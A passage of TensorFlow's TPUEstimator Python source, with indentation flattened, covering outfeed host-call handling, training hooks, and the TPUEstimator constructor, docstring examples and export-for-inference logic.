else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + ' If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated tensors are passed to the host_fn, which
is executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constrain it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
# It is assumed evaluation always happens on a single-host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Make the specification of the outfeed combination
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
# If the infeed is in BROADCAST mode (each core receiving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with ops.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = array_ops.identity(dequeue_ops[i][0])
else:
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# force all dequeue operations to be run if not consumed by the host calls
ret['__force_dequeue'] = control_flow_ops.group(*flat_dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` gets per-host batch size (see the sketch below).
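A minimal sketch (the shapes and the `...` body are illustrative) of an
`input_fn`/`model_fn` pair reading the per-shard batch size from `params`:
```
def input_fn(params):
  batch_size = params['batch_size']  # per-host or per-core shard size
  images = tf.random_uniform([1024, 28, 28, 1])
  dataset = tf.data.Dataset.from_tensor_slices(images)
  return dataset.batch(batch_size, drop_remainder=True)

def model_fn(features, labels, mode, params):
  batch_size = params['batch_size']  # always the per-core batch size
  ...
```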
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. However, if eval_on_tpu is False, `model_fn` must return
`EstimatorSpec` and the evaluation will execute on CPU or GPU; in this case
the following discussion on TPU evaluation does not apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
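For example, a hedged sketch of CPU-only testing (assuming `model_fn` and
`input_fn` are defined as above):
```
est = tf.contrib.tpu.TPUEstimator(
    model_fn=model_fn,
    config=tf.contrib.tpu.RunConfig(),
    use_tpu=False,
    train_batch_size=16,
    eval_batch_size=16)
est.train(input_fn=input_fn, max_steps=10)
```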
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.metrics.accuracy(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical systems. In addition, due to some
usability issues, for prediction with a small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shut down the TPU system
properly for the user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random_uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=predict_input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_savedmodel` exports two metagraphs, one with `tag_constants.SERVING`,
and another with both `tag_constants.SERVING` and `tag_constants.TPU`.
At serving time, these tags are used to select the metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If
not, please call `session.run(tpu.initialize_system())`.
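For example, a hedged sketch of loading the TPU metagraph and initializing
the TPU system yourself (the export path and `serving_input_receiver_fn` are
placeholders):
```
export_dir = est.export_savedmodel('/tmp/export', serving_input_receiver_fn)
with tf.Session(graph=tf.Graph()) as sess:
  tf.saved_model.loader.load(
      sess, [tag_constants.SERVING, tag_constants.TPU], export_dir)
  sess.run(tpu.initialize_system())
  # ... feed the serving signature's inputs and fetch its outputs ...
```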
`tpu.outside_compilation` can be used to wrap TPU incompatible ops in
`model_fn`.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] = export_output_lib.ClassificationOutput(
    classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
experimental_exported_model_uses_all_cores=False,
experimental_export_device_assignment=False,
experimental_embedding_config_spec=None):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, `evaluation_hooks`,
and `prediction_hooks` must not capture any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph, etc. This can
also be used to load checkpoints from the directory into an estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be the same. If
both are `None`, a temporary directory will be used.
config: A `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently:
- TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval (see below).
- Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_savedmodel()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported.
Currently, export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_savedmodel()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
experimental_exported_model_uses_all_cores: Whether to round-robin among
all cores visible to the host which is serving the saved model, or to
use a single core. This is a temporary flag to enable using all TPU
cores for inference with TPUPartitionedCall(). Once outside compilation
is supported in TPUPartitionedCall(), this flag will be enabled by
default.
experimental_export_device_assignment: Whether to include the device
assignment in the exported model. Doing so is useful in case of model
parallel inference but will tie the exported model to the TPU topology
used to export the model.
experimental_embedding_config_spec: Optional EmbeddingConfigSpec instance
to support using TPU embedding. IT IS STILL WORK IN PROGRESS, SO PLEASE
DO NOT USE.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to prevent TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Pass non-None params, as the wrapped model_fn expects it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = (
self._config.tpu_config.iterations_per_loop)
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu, experimental_embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
self._experimental_exported_model_uses_all_cores = (
experimental_exported_model_uses_all_cores)
self._experimental_export_device_assignment = (
experimental_export_device_assignment)
if (experimental_exported_model_uses_all_cores and
experimental_export_device_assignment):
raise ValueError('experimental_exported_model_uses_all_cores and '
'experimental_export_device_assignment are not supported '
'at the same time.')
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
logging.warning('TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_REWRITE_FOR_INFERENCE_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _REWRITE_FOR_INFERENCE_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables))
def _call_model_fn(self, features, labels, mode, config):
if mode == _REWRITE_FOR_INFERENCE_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_savedmodel`."""
if mode != _REWRITE_FOR_INFERENCE_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_REWRITE_FOR_INFERENCE_MODE, mode))
computation, capture = self._build_computation_for_inference(
features, labels, mode, config)
tensors = call_computation(
computation,
experimental_exported_model_uses_all_cores=self
._experimental_exported_model_uses_all_cores)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(self, features, labels, mode, config):
capture = _CapturedObject()
def computation():
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = self._build_tpu_computation_for_inference(
features, labels, mode, config)
if self._experimental_export_device_assignment:
# Export the device assignment as part of the model. This is useful for
# model parallel usecases where the model relies on the mapping between
# logical and physical devices.
with self._ctx.with_mode(mode) as ctx:
device_assignment = ctx.device_assignment
else:
device_assignment = None
tensors_on_cpu = tpu.rewrite_for_inference(
tpu_computation, device_assignment=device_assignment)
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture((estimator_spec, export_outputs_dict, predictions_dict,
none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(self, features, labels, mode,
config):
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
mode = model_fn_lib.ModeKeys.PREDICT
estimator_spec = self._call_model_fn(features, labels, mode, config)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [
t for t in export_outputs_list if t is not None
]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either features or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
# Setting the batch size in params first. This helps the user have the same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_savedmodel, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
